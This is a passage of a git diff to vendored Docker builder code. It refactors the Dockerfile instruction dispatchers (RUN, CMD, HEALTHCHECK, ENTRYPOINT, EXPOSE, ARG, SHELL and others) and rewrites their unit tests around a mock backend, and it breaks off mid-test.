d.state.buildArgs.FilterAllowed(stateRunConfig.Env) - args = handleJSONArgs(args, attributes) - - if !attributes["json"] { - args = append(getShell(b.runConfig), args...) - } - config := &container.Config{ - Cmd: strslice.StrSlice(args), - Image: b.image, - } - - // stash the cmd - cmd := b.runConfig.Cmd - if len(b.runConfig.Entrypoint) == 0 && len(b.runConfig.Cmd) == 0 { - b.runConfig.Cmd = config.Cmd - } - - // stash the config environment - env := b.runConfig.Env - - defer func(cmd strslice.StrSlice) { b.runConfig.Cmd = cmd }(cmd) - defer func(env []string) { b.runConfig.Env = env }(env) - - // derive the net build-time environment for this run. We let config - // environment override the build time environment. - // This means that we take the b.buildArgs list of env vars and remove - // any of those variables that are defined as part of the container. In other - // words, anything in b.Config.Env. What's left is the list of build-time env - // vars that we need to add to each RUN command - note the list could be empty. - // - // We don't persist the build time environment with container's config - // environment, but just sort and prepend it to the command string at time - // of commit. - // This helps with tracing back the image's actual environment at the time - // of RUN, without leaking it to the final image. It also aids cache - // lookup for same image built with same build time environment. - cmdBuildEnv := []string{} - configEnv := runconfigopts.ConvertKVStringsToMap(b.runConfig.Env) - for key, val := range b.options.BuildArgs { - if !b.isBuildArgAllowed(key) { - // skip build-args that are not in allowed list, meaning they have - // not been defined by an "ARG" Dockerfile command yet. - // This is an error condition but only if there is no "ARG" in the entire - // Dockerfile, so we'll generate any necessary errors after we parsed - // the entire file (see 'leftoverArgs' processing in evaluator.go ) - continue - } - if _, ok := configEnv[key]; !ok && val != nil { - cmdBuildEnv = append(cmdBuildEnv, fmt.Sprintf("%s=%s", key, *val)) - } + saveCmd := cmdFromArgs + if len(buildArgs) > 0 { + saveCmd = prependEnvOnCmd(d.state.buildArgs, buildArgs, cmdFromArgs) } - // derive the command to use for probeCache() and to commit in this container. - // Note that we only do this if there are any build-time env vars. Also, we - // use the special argument "|#" at the start of the args array. This will - // avoid conflicts with any RUN command since commands can not - // start with | (vertical bar). The "#" (number of build envs) is there to - // help ensure proper cache matches. We don't want a RUN command - // that starts with "foo=abc" to be considered part of a build-time env var. - saveCmd := config.Cmd - if len(cmdBuildEnv) > 0 { - sort.Strings(cmdBuildEnv) - tmpEnv := append([]string{fmt.Sprintf("|%d", len(cmdBuildEnv))}, cmdBuildEnv...) - saveCmd = strslice.StrSlice(append(tmpEnv, saveCmd...)) - } - - b.runConfig.Cmd = saveCmd - hit, err := b.probeCache() - if err != nil { + runConfigForCacheProbe := copyRunConfig(stateRunConfig, + withCmd(saveCmd), + withEntrypointOverride(saveCmd, nil)) + if hit, err := d.builder.probeCache(d.state, runConfigForCacheProbe); err != nil || hit { return err } - if hit { - return nil - } - // set Cmd manually, this is special case only for Dockerfiles - b.runConfig.Cmd = config.Cmd - // set build-time environment for 'run'. - b.runConfig.Env = append(b.runConfig.Env, cmdBuildEnv...) - // set config as already being escaped, this prevents double escaping on windows - b.runConfig.ArgsEscaped = true + runConfig := copyRunConfig(stateRunConfig, + withCmd(cmdFromArgs), + withEnv(append(stateRunConfig.Env, buildArgs...)), + withEntrypointOverride(saveCmd, strslice.StrSlice{""})) - logrus.Debugf("[BUILDER] Command to be executed: %v", b.runConfig.Cmd) + // set config as already being escaped, this prevents double escaping on windows + runConfig.ArgsEscaped = true - cID, err := b.create() + cID, err := d.builder.create(runConfig) if err != nil { return err } - if err := b.run(cID); err != nil { + if err := d.builder.containerManager.Run(d.builder.clientCtx, cID, d.builder.Stdout, d.builder.Stderr); err != nil { + if err, ok := err.(*statusCodeError); ok { + // TODO: change error type, because jsonmessage.JSONError assumes HTTP + msg := fmt.Sprintf( + "The command '%s' returned a non-zero code: %d", + strings.Join(runConfig.Cmd, " "), err.StatusCode()) + if err.Error() != "" { + msg = fmt.Sprintf("%s: %s", msg, err.Error()) + } + return &jsonmessage.JSONError{ + Message: msg, + Code: err.StatusCode(), + } + } return err } - // revert to original config environment and set the command string to - // have the build-time env vars in it (if any) so that future cache look-ups - // properly match it. - b.runConfig.Env = env - b.runConfig.Cmd = saveCmd - return b.commit(cID, cmd, "run") + return d.builder.commitContainer(d.state, cID, runConfigForCacheProbe) +} + +// Derive the command to use for probeCache() and to commit in this container. +// Note that we only do this if there are any build-time env vars. Also, we +// use the special argument "|#" at the start of the args array. This will +// avoid conflicts with any RUN command since commands can not +// start with | (vertical bar). The "#" (number of build envs) is there to +// help ensure proper cache matches. We don't want a RUN command +// that starts with "foo=abc" to be considered part of a build-time env var. +// +// remove any unreferenced built-in args from the environment variables. +// These args are transparent so resulting image should be the same regardless +// of the value. +func prependEnvOnCmd(buildArgs *BuildArgs, buildArgVars []string, cmd strslice.StrSlice) strslice.StrSlice { + var tmpBuildEnv []string + for _, env := range buildArgVars { + key := strings.SplitN(env, "=", 2)[0] + if buildArgs.IsReferencedOrNotBuiltin(key) { + tmpBuildEnv = append(tmpBuildEnv, env) + } + } + + sort.Strings(tmpBuildEnv) + tmpEnv := append([]string{fmt.Sprintf("|%d", len(tmpBuildEnv))}, tmpBuildEnv...) + return strslice.StrSlice(append(tmpEnv, cmd...)) } // CMD foo @@ -445,131 +418,39 @@ func run(b *Builder, args []string, attributes map[string]bool, original string) // Set the default command to run in the container (which may be empty). // Argument handling is the same as RUN. // -func cmd(b *Builder, args []string, attributes map[string]bool, original string) error { - if err := b.flags.Parse(); err != nil { - return err - } - - cmdSlice := handleJSONArgs(args, attributes) - - if !attributes["json"] { - cmdSlice = append(getShell(b.runConfig), cmdSlice...) - } - - b.runConfig.Cmd = strslice.StrSlice(cmdSlice) +func dispatchCmd(d dispatchRequest, c *instructions.CmdCommand) error { + runConfig := d.state.runConfig + cmd := resolveCmdLine(c.ShellDependantCmdLine, runConfig, d.state.operatingSystem) + runConfig.Cmd = cmd // set config as already being escaped, this prevents double escaping on windows - b.runConfig.ArgsEscaped = true + runConfig.ArgsEscaped = true - if err := b.commit("", b.runConfig.Cmd, fmt.Sprintf("CMD %q", cmdSlice)); err != nil { + if err := d.builder.commit(d.state, fmt.Sprintf("CMD %q", cmd)); err != nil { return err } - if len(args) != 0 { - b.cmdSet = true + if len(c.ShellDependantCmdLine.CmdLine) != 0 { + d.state.cmdSet = true } return nil } -// parseOptInterval(flag) is the duration of flag.Value, or 0 if -// empty. An error is reported if the value is given and is not positive. -func parseOptInterval(f *Flag) (time.Duration, error) { - s := f.Value - if s == "" { - return 0, nil - } - d, err := time.ParseDuration(s) - if err != nil { - return 0, err - } - if d <= 0 { - return 0, fmt.Errorf("Interval %#v must be positive", f.name) - } - return d, nil -} - // HEALTHCHECK foo // // Set the default healthcheck command to run in the container (which may be empty). // Argument handling is the same as RUN. // -func healthcheck(b *Builder, args []string, attributes map[string]bool, original string) error { - if len(args) == 0 { - return errAtLeastOneArgument("HEALTHCHECK") - } - typ := strings.ToUpper(args[0]) - args = args[1:] - if typ == "NONE" { - if len(args) != 0 { - return fmt.Errorf("HEALTHCHECK NONE takes no arguments") - } - test := strslice.StrSlice{typ} - b.runConfig.Healthcheck = &container.HealthConfig{ - Test: test, - } - } else { - if b.runConfig.Healthcheck != nil { - oldCmd := b.runConfig.Healthcheck.Test - if len(oldCmd) > 0 && oldCmd[0] != "NONE" { - fmt.Fprintf(b.Stdout, "Note: overriding previous HEALTHCHECK: %v\n", oldCmd) - } - } - - healthcheck := container.HealthConfig{} - - flInterval := b.flags.AddString("interval", "") - flTimeout := b.flags.AddString("timeout", "") - flRetries := b.flags.AddString("retries", "") - - if err := b.flags.Parse(); err != nil { - return err - } - - switch typ { - case "CMD": - cmdSlice := handleJSONArgs(args, attributes) - if len(cmdSlice) == 0 { - return fmt.Errorf("Missing command after HEALTHCHECK CMD") - } - - if !attributes["json"] { - typ = "CMD-SHELL" - } - - healthcheck.Test = strslice.StrSlice(append([]string{typ}, cmdSlice...)) - default: - return fmt.Errorf("Unknown type %#v in HEALTHCHECK (try CMD)", typ) - } - - interval, err := parseOptInterval(flInterval) - if err != nil { - return err +func dispatchHealthcheck(d dispatchRequest, c *instructions.HealthCheckCommand) error { + runConfig := d.state.runConfig + if runConfig.Healthcheck != nil { + oldCmd := runConfig.Healthcheck.Test + if len(oldCmd) > 0 && oldCmd[0] != "NONE" { + fmt.Fprintf(d.builder.Stdout, "Note: overriding previous HEALTHCHECK: %v\n", oldCmd) } - healthcheck.Interval = interval - - timeout, err := parseOptInterval(flTimeout) - if err != nil { - return err - } - healthcheck.Timeout = timeout - - if flRetries.Value != "" { - retries, err := strconv.ParseInt(flRetries.Value, 10, 32) - if err != nil { - return err - } - if retries < 1 { - return fmt.Errorf("--retries must be at least 1 (not %d)", retries) - } - healthcheck.Retries = int(retries) - } else { - healthcheck.Retries = 0 - } - - b.runConfig.Healthcheck = &healthcheck } - - return b.commit("", b.runConfig.Cmd, fmt.Sprintf("HEALTHCHECK %q", b.runConfig.Healthcheck)) + runConfig.Healthcheck = c.Health + return d.builder.commit(d.state, fmt.Sprintf("HEALTHCHECK %q", runConfig.Healthcheck)) } // ENTRYPOINT /usr/sbin/nginx @@ -577,80 +458,52 @@ func healthcheck(b *Builder, args []string, attributes map[string]bool, original // Set the entrypoint to /usr/sbin/nginx. Will accept the CMD as the arguments // to /usr/sbin/nginx. Uses the default shell if not in JSON format. // -// Handles command processing similar to CMD and RUN, only b.runConfig.Entrypoint -// is initialized at NewBuilder time instead of through argument parsing. +// Handles command processing similar to CMD and RUN, only req.runConfig.Entrypoint +// is initialized at newBuilder time instead of through argument parsing. // -func entrypoint(b *Builder, args []string, attributes map[string]bool, original string) error { - if err := b.flags.Parse(); err != nil { - return err - } - - parsed := handleJSONArgs(args, attributes) - - switch { - case attributes["json"]: - // ENTRYPOINT ["echo", "hi"] - b.runConfig.Entrypoint = strslice.StrSlice(parsed) - case len(parsed) == 0: - // ENTRYPOINT [] - b.runConfig.Entrypoint = nil - default: - // ENTRYPOINT echo hi - b.runConfig.Entrypoint = strslice.StrSlice(append(getShell(b.runConfig), parsed[0])) - } - - // when setting the entrypoint if a CMD was not explicitly set then - // set the command to nil - if !b.cmdSet { - b.runConfig.Cmd = nil - } - - if err := b.commit("", b.runConfig.Cmd, fmt.Sprintf("ENTRYPOINT %q", b.runConfig.Entrypoint)); err != nil { - return err +func dispatchEntrypoint(d dispatchRequest, c *instructions.EntrypointCommand) error { + runConfig := d.state.runConfig + cmd := resolveCmdLine(c.ShellDependantCmdLine, runConfig, d.state.operatingSystem) + runConfig.Entrypoint = cmd + if !d.state.cmdSet { + runConfig.Cmd = nil } - return nil + return d.builder.commit(d.state, fmt.Sprintf("ENTRYPOINT %q", runConfig.Entrypoint)) } // EXPOSE 6667/tcp 7000/tcp // // Expose ports for links and port mappings. This all ends up in -// b.runConfig.ExposedPorts for runconfig. -// -func expose(b *Builder, args []string, attributes map[string]bool, original string) error { - portsTab := args - - if len(args) == 0 { - return errAtLeastOneArgument("EXPOSE") +// req.runConfig.ExposedPorts for runconfig. +// +func dispatchExpose(d dispatchRequest, c *instructions.ExposeCommand, envs []string) error { + // custom multi word expansion + // expose $FOO with FOO="80 443" is expanded as EXPOSE [80,443]. This is the only command supporting word to words expansion + // so the word processing has been de-generalized + ports := []string{} + for _, p := range c.Ports { + ps, err := d.shlex.ProcessWords(p, envs) + if err != nil { + return err + } + ports = append(ports, ps...) } + c.Ports = ports - if err := b.flags.Parse(); err != nil { + ps, _, err := nat.ParsePortSpecs(ports) + if err != nil { return err } - if b.runConfig.ExposedPorts == nil { - b.runConfig.ExposedPorts = make(nat.PortSet) + if d.state.runConfig.ExposedPorts == nil { + d.state.runConfig.ExposedPorts = make(nat.PortSet) } - - ports, _, err := nat.ParsePortSpecs(portsTab) - if err != nil { - return err + for p := range ps { + d.state.runConfig.ExposedPorts[p] = struct{}{} } - // instead of using ports directly, we build a list of ports and sort it so - // the order is consistent. This prevents cache burst where map ordering - // changes between builds - portList := make([]string, len(ports)) - var i int - for port := range ports { - if _, exists := b.runConfig.ExposedPorts[port]; !exists { - b.runConfig.ExposedPorts[port] = struct{}{} - } - portList[i] = string(port) - i++ - } - sort.Strings(portList) - return b.commit("", b.runConfig.Cmd, fmt.Sprintf("EXPOSE %s", strings.Join(portList, " "))) + return d.builder.commit(d.state, "EXPOSE "+strings.Join(c.Ports, " ")) } // USER foo @@ -658,164 +511,61 @@ func expose(b *Builder, args []string, attributes map[string]bool, original stri // Set the user to 'foo' for future commands and when running the // ENTRYPOINT/CMD at container run time. // -func user(b *Builder, args []string, attributes map[string]bool, original string) error { - if len(args) != 1 { - return errExactlyOneArgument("USER") - } - - if err := b.flags.Parse(); err != nil { - return err - } - - b.runConfig.User = args[0] - return b.commit("", b.runConfig.Cmd, fmt.Sprintf("USER %v", args)) +func dispatchUser(d dispatchRequest, c *instructions.UserCommand) error { + d.state.runConfig.User = c.User + return d.builder.commit(d.state, fmt.Sprintf("USER %v", c.User)) } // VOLUME /foo // // Expose the volume /foo for use. Will also accept the JSON array form. // -func volume(b *Builder, args []string, attributes map[string]bool, original string) error { - if len(args) == 0 { - return errAtLeastOneArgument("VOLUME") - } - - if err := b.flags.Parse(); err != nil { - return err - } - - if b.runConfig.Volumes == nil { - b.runConfig.Volumes = map[string]struct{}{} +func dispatchVolume(d dispatchRequest, c *instructions.VolumeCommand) error { + if d.state.runConfig.Volumes == nil { + d.state.runConfig.Volumes = map[string]struct{}{} } - for _, v := range args { - v = strings.TrimSpace(v) + for _, v := range c.Volumes { if v == "" { - return fmt.Errorf("VOLUME specified can not be an empty string") + return errors.New("VOLUME specified can not be an empty string") } - b.runConfig.Volumes[v] = struct{}{} - } - if err := b.commit("", b.runConfig.Cmd, fmt.Sprintf("VOLUME %v", args)); err != nil { - return err + d.state.runConfig.Volumes[v] = struct{}{} } - return nil + return d.builder.commit(d.state, fmt.Sprintf("VOLUME %v", c.Volumes)) } // STOPSIGNAL signal // // Set the signal that will be used to kill the container. -func stopSignal(b *Builder, args []string, attributes map[string]bool, original string) error { - if len(args) != 1 { - return errExactlyOneArgument("STOPSIGNAL") - } +func dispatchStopSignal(d dispatchRequest, c *instructions.StopSignalCommand) error { - sig := args[0] - _, err := signal.ParseSignal(sig) + _, err := signal.ParseSignal(c.Signal) if err != nil { - return err + return errdefs.InvalidParameter(err) } - - b.runConfig.StopSignal = sig - return b.commit("", b.runConfig.Cmd, fmt.Sprintf("STOPSIGNAL %v", args)) + d.state.runConfig.StopSignal = c.Signal + return d.builder.commit(d.state, fmt.Sprintf("STOPSIGNAL %v", c.Signal)) } // ARG name[=value] // // Adds the variable foo to the trusted list of variables that can be passed -// to builder using the --build-arg flag for expansion/subsitution or passing to 'run'. +// to builder using the --build-arg flag for expansion/substitution or passing to 'run'. // Dockerfile author may optionally set a default value of this variable. -func arg(b *Builder, args []string, attributes map[string]bool, original string) error { - if len(args) != 1 { - return errExactlyOneArgument("ARG") - } - - var ( - name string - newValue string - hasDefault bool - ) - - arg := args[0] - // 'arg' can just be a name or name-value pair. Note that this is different - // from 'env' that handles the split of name and value at the parser level. - // The reason for doing it differently for 'arg' is that we support just - // defining an arg and not assign it a value (while 'env' always expects a - // name-value pair). If possible, it will be good to harmonize the two. - if strings.Contains(arg, "=") { - parts := strings.SplitN(arg, "=", 2) - if len(parts[0]) == 0 { - return errBlankCommandNames("ARG") - } - - name = parts[0] - newValue = parts[1] - hasDefault = true - } else { - name = arg - hasDefault = false - } - // add the arg to allowed list of build-time args from this step on. - b.allowedBuildArgs[name] = true +func dispatchArg(d dispatchRequest, c *instructions.ArgCommand) error { - // If there is a default value associated with this arg then add it to the - // b.buildArgs if one is not already passed to the builder. The args passed - // to builder override the default value of 'arg'. Note that a 'nil' for - // a value means that the user specified "--build-arg FOO" and "FOO" wasn't - // defined as an env var - and in that case we DO want to use the default - // value specified in the ARG cmd. - if baValue, ok := b.options.BuildArgs[name]; (!ok || baValue == nil) && hasDefault { - b.options.BuildArgs[name] = &newValue + commitStr := "ARG " + c.Key + if c.Value != nil { + commitStr += "=" + *c.Value } - return b.commit("", b.runConfig.Cmd, fmt.Sprintf("ARG %s", arg)) + d.state.buildArgs.AddArg(c.Key, c.Value) + return d.builder.commit(d.state, commitStr) } // SHELL powershell -command // // Set the non-default shell to use. -func shell(b *Builder, args []string, attributes map[string]bool, original string) error { - if err := b.flags.Parse(); err != nil { - return err - } - shellSlice := handleJSONArgs(args, attributes) - switch { - case len(shellSlice) == 0: - // SHELL [] - return errAtLeastOneArgument("SHELL") - case attributes["json"]: - // SHELL ["powershell", "-command"] - b.runConfig.Shell = strslice.StrSlice(shellSlice) - default: - // SHELL powershell -command - not JSON - return errNotJSON("SHELL", original) - } - return b.commit("", b.runConfig.Cmd, fmt.Sprintf("SHELL %v", shellSlice)) -} - -func errAtLeastOneArgument(command string) error { - return fmt.Errorf("%s requires at least one argument", command) -} - -func errExactlyOneArgument(command string) error { - return fmt.Errorf("%s requires exactly one argument", command) -} - -func errAtLeastTwoArguments(command string) error { - return fmt.Errorf("%s requires at least two arguments", command) -} - -func errBlankCommandNames(command string) error { - return fmt.Errorf("%s names can not be blank", command) -} - -func errTooManyArguments(command string) error { - return fmt.Errorf("Bad input to %s, too many arguments", command) -} - -// getShell is a helper function which gets the right shell for prefixing the -// shell-form of RUN, ENTRYPOINT and CMD instructions -func getShell(c *container.Config) []string { - if 0 == len(c.Shell) { - return defaultShell[:] - } - return c.Shell[:] +func dispatchShell(d dispatchRequest, c *instructions.ShellCommand) error { + d.state.runConfig.Shell = c.Shell + return d.builder.commit(d.state, fmt.Sprintf("SHELL %v", d.state.runConfig.Shell)) } diff --git a/vendor/github.com/docker/docker/builder/dockerfile/dispatchers_test.go b/vendor/github.com/docker/docker/builder/dockerfile/dispatchers_test.go index f7c57f7e3b..36d20a1a82 100644 --- a/vendor/github.com/docker/docker/builder/dockerfile/dispatchers_test.go +++ b/vendor/github.com/docker/docker/builder/dockerfile/dispatchers_test.go @@ -1,517 +1,474 @@ -package dockerfile +package dockerfile // import "github.com/docker/docker/builder/dockerfile" import ( - "fmt" + "bytes" + "context" "runtime" - "strings" "testing" "github.com/docker/docker/api/types" + "github.com/docker/docker/api/types/backend" "github.com/docker/docker/api/types/container" "github.com/docker/docker/api/types/strslice" + "github.com/docker/docker/builder" + "github.com/docker/docker/image" + "github.com/docker/docker/pkg/system" "github.com/docker/go-connections/nat" + "github.com/moby/buildkit/frontend/dockerfile/instructions" + "github.com/moby/buildkit/frontend/dockerfile/shell" + "gotest.tools/assert" + is "gotest.tools/assert/cmp" ) -type commandWithFunction struct { - name string - function func(args []string) error +func newBuilderWithMockBackend() *Builder { + mockBackend := &MockBackend{} + ctx := context.Background() + b := &Builder{ + options: &types.ImageBuildOptions{Platform: runtime.GOOS}, + docker: mockBackend, + Stdout: new(bytes.Buffer), + clientCtx: ctx, + disableCommit: true, + imageSources: newImageSources(ctx, builderOptions{ + Options: &types.ImageBuildOptions{Platform: runtime.GOOS}, + Backend: mockBackend, + }), + imageProber: newImageProber(mockBackend, nil, false), + containerManager: newContainerManager(mockBackend), + } + return b } -func TestCommandsExactlyOneArgument(t *testing.T) { - commands := []commandWithFunction{ - {"MAINTAINER", func(args []string) error { return maintainer(nil, args, nil, "") }}, - {"FROM", func(args []string) error { return from(nil, args, nil, "") }}, - {"WORKDIR", func(args []string) error { return workdir(nil, args, nil, "") }}, - {"USER", func(args []string) error { return user(nil, args, nil, "") }}, - {"STOPSIGNAL", func(args []string) error { return stopSignal(nil, args, nil, "") }}} - - for _, command := range commands { - err := command.function([]string{}) - - if err == nil { - t.Fatalf("Error should be present for %s command", command.name) - } - - expectedError := errExactlyOneArgument(command.name) - - if err.Error() != expectedError.Error() { - t.Fatalf("Wrong error message for %s. Got: %s. Should be: %s", command.name, err.Error(), expectedError) - } - } -} - -func TestCommandsAtLeastOneArgument(t *testing.T) { - commands := []commandWithFunction{ - {"ENV", func(args []string) error { return env(nil, args, nil, "") }}, - {"LABEL", func(args []string) error { return label(nil, args, nil, "") }}, - {"ONBUILD", func(args []string) error { return onbuild(nil, args, nil, "") }}, - {"HEALTHCHECK", func(args []string) error { return healthcheck(nil, args, nil, "") }}, - {"EXPOSE", func(args []string) error { return expose(nil, args, nil, "") }}, - {"VOLUME", func(args []string) error { return volume(nil, args, nil, "") }}} - - for _, command := range commands { - err := command.function([]string{}) - - if err == nil { - t.Fatalf("Error should be present for %s command", command.name) - } - - expectedError := errAtLeastOneArgument(command.name) - - if err.Error() != expectedError.Error() { - t.Fatalf("Wrong error message for %s. Got: %s. Should be: %s", command.name, err.Error(), expectedError) - } - } +func TestEnv2Variables(t *testing.T) { + b := newBuilderWithMockBackend() + sb := newDispatchRequest(b, '\\', nil, NewBuildArgs(make(map[string]*string)), newStagesBuildResults()) + envCommand := &instructions.EnvCommand{ + Env: instructions.KeyValuePairs{ + instructions.KeyValuePair{Key: "var1", Value: "val1"}, + instructions.KeyValuePair{Key: "var2", Value: "val2"}, + }, + } + err := dispatch(sb, envCommand) + assert.NilError(t, err) + + expected := []string{ + "var1=val1", + "var2=val2", + } + assert.Check(t, is.DeepEqual(expected, sb.state.runConfig.Env)) } -func TestCommandsAtLeastTwoArguments(t *testing.T) { - commands := []commandWithFunction{ - {"ADD", func(args []string) error { return add(nil, args, nil, "") }}, - {"COPY", func(args []string) error { return dispatchCopy(nil, args, nil, "") }}} - - for _, command := range commands { - err := command.function([]string{"arg1"}) - - if err == nil { - t.Fatalf("Error should be present for %s command", command.name) - } - - expectedError := errAtLeastTwoArguments(command.name) - - if err.Error() != expectedError.Error() { - t.Fatalf("Wrong error message for %s. Got: %s. Should be: %s", command.name, err.Error(), expectedError) - } - } +func TestEnvValueWithExistingRunConfigEnv(t *testing.T) { + b := newBuilderWithMockBackend() + sb := newDispatchRequest(b, '\\', nil, NewBuildArgs(make(map[string]*string)), newStagesBuildResults()) + sb.state.runConfig.Env = []string{"var1=old", "var2=fromenv"} + envCommand := &instructions.EnvCommand{ + Env: instructions.KeyValuePairs{ + instructions.KeyValuePair{Key: "var1", Value: "val1"}, + }, + } + err := dispatch(sb, envCommand) + assert.NilError(t, err) + expected := []string{ + "var1=val1", + "var2=fromenv", + } + assert.Check(t, is.DeepEqual(expected, sb.state.runConfig.Env)) } -func TestCommandsTooManyArguments(t *testing.T) { - commands := []commandWithFunction{ - {"ENV", func(args []string) error { return env(nil, args, nil, "") }}, - {"LABEL", func(args []string) error { return label(nil, args, nil, "") }}} - - for _, command := range commands { - err := command.function([]string{"arg1", "arg2", "arg3"}) - - if err == nil { - t.Fatalf("Error should be present for %s command", command.name) - } - - expectedError := errTooManyArguments(command.name) - - if err.Error() != expectedError.Error() { - t.Fatalf("Wrong error message for %s. Got: %s. Should be: %s", command.name, err.Error(), expectedError) - } - } +func TestMaintainer(t *testing.T) { + maintainerEntry := "Some Maintainer " + b := newBuilderWithMockBackend() + sb := newDispatchRequest(b, '\\', nil, NewBuildArgs(make(map[string]*string)), newStagesBuildResults()) + cmd := &instructions.MaintainerCommand{Maintainer: maintainerEntry} + err := dispatch(sb, cmd) + assert.NilError(t, err) + assert.Check(t, is.Equal(maintainerEntry, sb.state.maintainer)) } -func TestCommandseBlankNames(t *testing.T) { - bflags := &BFlags{} - config := &container.Config{} - - b := &Builder{flags: bflags, runConfig: config, disableCommit: true} +func TestLabel(t *testing.T) { + labelName := "label" + labelValue := "value" - commands := []commandWithFunction{ - {"ENV", func(args []string) error { return env(b, args, nil, "") }}, - {"LABEL", func(args []string) error { return label(b, args, nil, "") }}, + b := newBuilderWithMockBackend() + sb := newDispatchRequest(b, '\\', nil, NewBuildArgs(make(map[string]*string)), newStagesBuildResults()) + cmd := &instructions.LabelCommand{ + Labels: instructions.KeyValuePairs{ + instructions.KeyValuePair{Key: labelName, Value: labelValue}, + }, } + err := dispatch(sb, cmd) + assert.NilError(t, err) - for _, command := range commands { - err := command.function([]string{"", ""}) - - if err == nil { - t.Fatalf("Error should be present for %s command", command.name) - } - - expectedError := errBlankCommandNames(command.name) - - if err.Error() != expectedError.Error() { - t.Fatalf("Wrong error message for %s. Got: %s. Should be: %s", command.name, err.Error(), expectedError) - } - } + assert.Assert(t, is.Contains(sb.state.runConfig.Labels, labelName)) + assert.Check(t, is.Equal(sb.state.runConfig.Labels[labelName], labelValue)) } -func TestEnv2Variables(t *testing.T) { - variables := []string{"var1", "val1", "var2", "val2"} - - bflags := &BFlags{} - config := &container.Config{} - - b := &Builder{flags: bflags, runConfig: config, disableCommit: true} - - if err := env(b, variables, nil, ""); err != nil { - t.Fatalf("Error when executing env: %s", err.Error()) +func TestFromScratch(t *testing.T) { + b := newBuilderWithMockBackend() + sb := newDispatchRequest(b, '\\', nil, NewBuildArgs(make(map[string]*string)), newStagesBuildResults()) + cmd := &instructions.Stage{ + BaseName: "scratch", } + err := initializeStage(sb, cmd) - expectedVar1 := fmt.Sprintf("%s=%s", variables[0], variables[1]) - expectedVar2 := fmt.Sprintf("%s=%s", variables[2], variables[3]) - - if b.runConfig.Env[0] != expectedVar1 { - t.Fatalf("Wrong env output for first variable. Got: %s. Should be: %s", b.runConfig.Env[0], expectedVar1) + if runtime.GOOS == "windows" && !system.LCOWSupported() { + assert.Check(t, is.Error(err, "Windows does not support FROM scratch")) + return } - if b.runConfig.Env[1] != expectedVar2 { - t.Fatalf("Wrong env output for second variable. Got: %s, Should be: %s", b.runConfig.Env[1], expectedVar2) - } + assert.NilError(t, err) + assert.Check(t, sb.state.hasFromImage()) + assert.Check(t, is.Equal("", sb.state.imageID)) + expected := "PATH=" + system.DefaultPathEnv(runtime.GOOS) + assert.Check(t, is.DeepEqual([]string{expected}, sb.state.runConfig.Env)) } -func TestMaintainer(t *testing.T) { - maintainerEntry := "Some Maintainer " - - b := &Builder{flags: &BFlags{}, runConfig: &container.Config{}, disableCommit: true} +func TestFromWithArg(t *testing.T) { + tag, expected := ":sometag", "expectedthisid" - if err := maintainer(b, []string{maintainerEntry}, nil, ""); err != nil { - t.Fatalf("Error when executing maintainer: %s", err.Error()) + getImage := func(name string) (builder.Image, builder.ROLayer, error) { + assert.Check(t, is.Equal("alpine"+tag, name)) + return &mockImage{id: "expectedthisid"}, nil, nil } + b := newBuilderWithMockBackend() + b.docker.(*MockBackend).getImageFunc = getImage + args := NewBuildArgs(make(map[string]*string)) - if b.maintainer != maintainerEntry { - t.Fatalf("Maintainer in builder should be set to %s. Got: %s", maintainerEntry, b.maintainer) - } -} - -func TestLabel(t *testing.T) { - labelName := "label" - labelValue := "value" - - labelEntry := []string{labelName, labelValue} - - b := &Builder{flags: &BFlags{}, runConfig: &container.Config{}, disableCommit: true} - - if err := label(b, labelEntry, nil, ""); err != nil { - t.Fatalf("Error when executing label: %s", err.Error()) + val := "sometag" + metaArg := instructions.ArgCommand{ + Key: "THETAG", + Value: &val, } - - if val, ok := b.runConfig.Labels[labelName]; ok { - if val != labelValue { - t.Fatalf("Label %s should have value %s, had %s instead", labelName, labelValue, val) - } - } else { - t.Fatalf("Label %s should be present but it is not", labelName) + cmd := &instructions.Stage{ + BaseName: "alpine:${THETAG}", } -} - -func TestFrom(t *testing.T) { - b := &Builder{flags: &BFlags{}, runConfig: &container.Config{}, disableCommit: true} + err := processMetaArg(metaArg, shell.NewLex('\\'), args) - err := from(b, []string{"scratch"}, nil, "") + sb := newDispatchRequest(b, '\\', nil, args, newStagesBuildResults()) + assert.NilError(t, err) + err = initializeStage(sb, cmd) + assert.NilError(t, err) - if runtime.GOOS == "windows" { - if err == nil { - t.Fatalf("Error not set on Windows") - } + assert.Check(t, is.Equal(expected, sb.state.imageID)) + assert.Check(t, is.Equal(expected, sb.state.baseImage.ImageID())) + assert.Check(t, is.Len(sb.state.buildArgs.GetAllAllowed(), 0)) + assert.Check(t, is.Len(sb.state.buildArgs.GetAllMeta(), 1)) +} - expectedError := "Windows does not support FROM scratch" +func TestFromWithUndefinedArg(t *testing.T) { + tag, expected := "sometag", "expectedthisid" - if !strings.Contains(err.Error(), expectedError) { - t.Fatalf("Error message not correct on Windows. Should be: %s, got: %s", expectedError, err.Error()) - } - } else { - if err != nil { - t.Fatalf("Error when executing from: %s", err.Error()) - } + getImage := func(name string) (builder.Image, builder.ROLayer, error) { + assert.Check(t, is.Equal("alpine", name)) + return &mockImage{id: "expectedthisid"}, nil, nil + } + b := newBuilderWithMockBackend() + b.docker.(*MockBackend).getImageFunc = getImage + sb := newDispatchRequest(b, '\\', nil, NewBuildArgs(make(map[string]*string)), newStagesBuildResults()) - if b.image != "" { - t.Fatalf("Image shoule be empty, got: %s", b.image) - } + b.options.BuildArgs = map[string]*string{"THETAG": &tag} - if b.noBaseImage != true { - t.Fatalf("Image should not have any base image, got: %v", b.noBaseImage) - } + cmd := &instructions.Stage{ + BaseName: "alpine${THETAG}", } + err := initializeStage(sb, cmd) + assert.NilError(t, err) + assert.Check(t, is.Equal(expected, sb.state.imageID)) } -func TestOnbuildIllegalTriggers(t *testing.T) { - triggers := []struct{ command, expectedError string }{ - {"ONBUILD", "Chaining ONBUILD via `ONBUILD ONBUILD` isn't allowed"}, - {"MAINTAINER", "MAINTAINER isn't allowed as an ONBUILD trigger"}, - {"FROM", "FROM isn't allowed as an ONBUILD trigger"}} - - for _, trigger := range triggers { - b := &Builder{flags: &BFlags{}, runConfig: &container.Config{}, disableCommit: true} - - err := onbuild(b, []string{trigger.command}, nil, "") - - if err == nil { - t.Fatalf("Error should not be nil") - } - - if !strings.Contains(err.Error(), trigger.expectedError) { - t.Fatalf("Error message not correct. Should be: %s, got: %s", trigger.expectedError, err.Error()) - } - } +func TestFromMultiStageWithNamedStage(t *testing.T) { + b := newBuilderWithMockBackend() + firstFrom := &instructions.Stage{BaseName: "someimg", Name: "base"} + secondFrom := &instructions.Stage{BaseName: "base"} + previousResults := newStagesBuildResults() + firstSB := 